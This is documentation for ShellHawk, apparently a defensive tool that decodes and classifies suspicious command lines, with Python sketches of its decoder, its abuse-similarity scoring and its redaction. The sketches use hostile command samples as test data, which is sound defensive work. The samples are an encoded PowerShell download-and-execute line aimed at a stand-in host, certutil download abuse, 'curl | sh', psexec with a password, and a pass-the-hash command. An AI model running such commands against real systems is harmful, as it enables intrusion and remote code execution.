ShellHawk

Documentation

ShellHawk is a free command-line analyzer for incident responders. Paste a suspicious command, get a structured analysis and a shareable permalink.

What it does

ShellHawk analyzes command-line strings and returns a structured verdict covering: obfuscation decoding (base64, UTF-16LE, gzip — up to 5 layers), LOLBAS/GTFOBins binary matching, MITRE ATT&CK technique tagging, LOLDrivers (BYOVD) detection, parent process plausibility scoring, and threat class classification.

Every analysis produces a stable permalink at /c/<slug>. The slug is a base32-encoded SHA-256 of the normalized command, so the same command always resolves to the same URL — submissions are idempotent.

What it is NOT

  • A SIEM, SOAR, or EDR. It does not ingest your logs.
  • A generic shell explainer — explainshell.com serves Linux learners; we serve incident responders looking at hostile commands.
  • A CyberChef replacement — CyberChef lets you build manual recipes; ShellHawk is paste-and-go with a security verdict.
  • A URL scanner — urlscan.io does that. ShellHawk enriches URLs found inside decoded payloads, but URL scanning is not its primary purpose.
  • A file sandbox — ANY.RUN does that. Paste the command you extracted; don't expect file execution.

Analysis pipeline

1. Parse: bashlex parses the shell AST. Windows commands and PowerShell are expected to fail the Linux parser; the remaining steps run regardless.
2. Decode: recursive decoding of base64 → UTF-16LE → gzip → repeat, up to 5 layers. If layers remain beyond that, decoding stops and the verdict is marked 'complex obfuscation, manual review needed'.
3. LOLBAS / GTFOBins: binary-name match against the vendored LOLBAS and GTFOBins catalogs, then an argument-similarity score (SequenceMatcher on the argument string plus flag-set Jaccard) against each entry's known abuse examples, which separates abuse patterns from benign dual-use invocations.
4. LOLDrivers: filename matching against the loldrivers.io catalog, flagging Bring-Your-Own-Vulnerable-Driver (BYOVD) patterns.
5. MITRE ATT&CK: technique IDs from LOLBAS matches are enriched with names, tactics, and links from the official STIX dataset.
6. Threat classification: 7 threat classes (dropper, loader, C2/persistence, credential theft, lateral movement, defense evasion, recon) via regex signal rules, each reported with high, medium, or low confidence.
7. Parent process: suspicion score for the parent→child process pair against known-bad relationships (e.g. winword.exe → powershell.exe = high).
8. VirusTotal: URLs extracted from decoded layers are looked up in VirusTotal (read-only; no data is submitted). Requires VIRUSTOTAL_API_KEY.
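The pipeline above, reduced to a runnable sketch. This is an added example and not ShellHawk's own code: it implements the permalink slug from the overview (base32 of SHA-256, with whitespace collapsing as an assumed normalization, since the page does not spell out the rules), the capped base64 / UTF-16LE / gzip decoder from step 2 with the 'complex obfuscation' stop, and the SequenceMatcher-plus-Jaccard argument similarity from step 3 against a constructed two-entry stand-in for the LOLBAS catalog. The sample commands, the example.invalid URLs and the catalog entries are all constructed; the threat-class rules, LOLDrivers, ATT&CK enrichment, parent-process table and VirusTotal lookup are not modelled.

```python
"""Miniature ShellHawk-style pipeline: added example, not ShellHawk's own code."""
import base64
import binascii
import gzip
import hashlib
import re
from difflib import SequenceMatcher

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # heuristic: long base64-looking runs

# Constructed stand-in for the vendored LOLBAS catalog (binary -> known abuse examples).
LOLBAS_EXAMPLES = {
    "certutil": ["certutil.exe -urlcache -split -f http://example.invalid/x.exe x.exe",
                 "certutil.exe -decode payload.b64 payload.exe"],
}

def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower().removesuffix(".exe")

def slug_for(command: str) -> str:
    """base32(SHA-256(normalized command)); whitespace collapsing is an assumed normalization."""
    digest = hashlib.sha256(" ".join(command.split()).encode()).digest()
    return base64.b32encode(digest).decode().rstrip("=").lower()

def _decode_once(text: str):
    """Peel one layer: longest base64 token -> gunzip if gzip magic -> UTF-16LE or UTF-8."""
    token = max(B64_TOKEN.findall(text), key=len, default=None)
    if token is None:
        return None
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except binascii.Error:
        return None
    kind = "base64"
    if raw[:2] == b"\x1f\x8b":
        try:
            raw, kind = gzip.decompress(raw), "base64+gzip"
        except (OSError, EOFError):
            return None
    # UTF-16LE of ASCII text has a NUL in (nearly) every odd byte position
    wide = len(raw) >= 4 and len(raw) % 2 == 0 and raw[1::2].count(0) * 10 >= len(raw) * 4
    try:
        return (kind + "+utf16le", raw.decode("utf-16-le")) if wide else (kind, raw.decode())
    except UnicodeDecodeError:
        return None

def decode_layers(command: str, max_layers: int = 5):
    """Returns (layers, gave_up); gave_up means more layers remained after the cap."""
    layers, current = [], command
    for _ in range(max_layers):
        step = _decode_once(current)
        if step is None:
            return layers, False
        layers.append(step)
        current = step[1]
    return layers, _decode_once(current) is not None

def flag_set(cmdline: str) -> set:
    return {t.lstrip("-/").lower() for t in cmdline.split() if len(t) > 1 and t[0] in "-/"}

def abuse_similarity(cmdline: str, abuse_examples) -> float:
    """Best 0.5*SequenceMatcher(argument string) + 0.5*Jaccard(flag set) over examples."""
    args, flags, best = " ".join(cmdline.split()[1:]).lower(), flag_set(cmdline), 0.0
    for ex in abuse_examples:
        seq = SequenceMatcher(None, args, " ".join(ex.split()[1:]).lower()).ratio()
        ex_flags = flag_set(ex)
        jac = len(flags & ex_flags) / len(flags | ex_flags) if flags | ex_flags else 0.0
        best = max(best, (seq + jac) / 2)
    return round(best, 3)

def analyze(command: str) -> dict:
    """Structured verdict for one command line (only the parts this sketch models)."""
    layers, gave_up = decode_layers(command)
    binary = _basename(command.split()[0])
    return {
        "slug": slug_for(command),
        "layers": [kind for kind, _ in layers],
        "decoded": layers[-1][1] if layers else command,
        "note": "complex obfuscation, manual review needed" if gave_up else None,
        "lolbas_score": abuse_similarity(command, LOLBAS_EXAMPLES.get(binary, [])),
    }

def nest_base64(text: str, n: int) -> str:
    return text if n == 0 else nest_base64(base64.b64encode(text.encode()).decode(), n - 1)

def gzip_b64(text: str) -> str:
    return base64.b64encode(gzip.compress(text.encode())).decode()

# Constructed sample: base64(UTF-16LE(script)), the form PowerShell -enc expects.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLE_COMMAND = "powershell.exe -NoP -W Hidden -enc " + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()

if __name__ == "__main__":
    print(analyze(SAMPLE_COMMAND))
    print(analyze("sh -c " + nest_base64("echo hello from six layers down", 6))["note"])
```

The base64 heuristic (any run of 16 or more base64 characters) is deliberately loose; strict padding validation, the UTF-8 decode check and the layer cap are what stop it from chasing noise, and the cap is reported as a note rather than silently truncating so the analyst knows there is more underneath. The similarity score keys on flags rather than on URLs or filenames, which is why a certutil download-and-split pattern scores high against the catalog while certutil -verify does not.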

Privacy

ShellHawk is built for analysts who paste real commands from real incidents. Privacy is non-negotiable.

  • Commands are redacted before storage — credentials, internal IPs, and NTLM hashes are masked.
  • No third-party analytics scripts. No Google Analytics, Hotjar, or Segment.
  • VirusTotal enrichment is read-only. We look up URLs VT already knows about; we never submit novel URLs.
  • You can delete your submission at any time. The slug becomes a tombstone — old links show 'deleted', not a broken 404.
  • Public commands are stored in a shared corpus and may appear in search results. If this is a concern, delete after analysis.
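One way to implement the redaction pass in the first bullet, as an added example rather than ShellHawk's own code. The rules (RFC 1918 ranges for internal IPs, 32-hex NTLM hashes singly or as LM:NT pairs, and password=, -p, /pass: and user:pass credential forms) and the sample commands are constructed; the page does not publish ShellHawk's actual patterns.

```python
"""Store-side redaction pass: added example, not ShellHawk's own code."""
import re

# Rules run in order, each replacing the sensitive span with a <TOKEN>. NTLM pairs
# go first so "LM:NT" is masked as one unit; the user:pass rule goes last so it
# does not re-mask a hash that is already tokenised.
REDACTION_RULES = [
    ("NTLM_HASH_PAIR", re.compile(r"\b[0-9a-f]{32}:[0-9a-f]{32}\b", re.I)),
    ("NTLM_HASH", re.compile(r"\b[0-9a-f]{32}\b", re.I)),
    ("INTERNAL_IP", re.compile(              # RFC 1918 only; public IPs are kept
        r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
        r"|192\.168\.\d{1,3}\.\d{1,3}"
        r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3})\b")),
    # key=value and flag forms: password=x, /pass:x, -p x, --password x|=x, /p:x
    ("CREDENTIAL", re.compile(
        r"(\b(?:pass(?:w(?:or)?d)?|pwd|secret|token|api[_-]?key)\s*[:=]\s*"
        r"|(?<!\S)(?:-p\s+|--password[\s=]+|/p:))"
        r"(\"[^\"]*\"|'[^']*'|\S+)", re.I)),
    # user:password after -u / -U / --user (curl, impacket, winexe style)
    ("CREDENTIAL", re.compile(r"((?<!\S)(?:-u|-U|--user)\s+[^\s:]+:)(\S+)")),
]


def redact(command: str):
    """Return (redacted command, names of the rules that fired, in order)."""
    fired = []
    for name, rx in REDACTION_RULES:
        def mask(m, name=name):
            fired.append(name)
            prefix = m.group(1) if m.lastindex else ""  # keep the key/flag, mask the value
            return f"{prefix}<{name}>"
        command = rx.sub(mask, command)
    return command, fired


# Constructed samples of the kind an analyst might paste (hashes are the well-known
# empty-LM / "password" NT values, not real credentials).
SAMPLES = [
    r"psexec \\10.0.0.5 -u corp\admin -p Winter2024! cmd.exe",
    "curl -u admin:Hunter2 http://192.168.10.4/api",
    "pth-winexe -U admin%aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c //10.10.1.2 cmd",
    "curl http://203.0.113.9/drop.sh | sh",  # public IP, nothing to mask
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(redact(s))
```

Redaction is lossy by design: the flag or key is kept so the analysis can still see that a password was passed on the command line, only the value disappears. Run it before the slug is computed and before anything touches disk, and keep the list of fired rules so the UI can tell the submitter what was masked; rule order matters, as the comments note, because a later rule will happily re-match text an earlier one already replaced.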

Data sources

LOLBAS
LOLBAS-Project/LOLBAS

Vendored as a git submodule, refreshed weekly.

GTFOBins
GTFOBins/GTFOBins.github.io

Vendored as a git submodule, refreshed weekly.

LOLDrivers
loldrivers.io

Fetched via the API and baked into the build, refreshed weekly.

MITRE ATT&CK
mitre/cti

Enterprise STIX bundle, pinned version, refreshed quarterly.

Open source & feedback

Found a bug or have a feature request? Submit a bug report. No account required.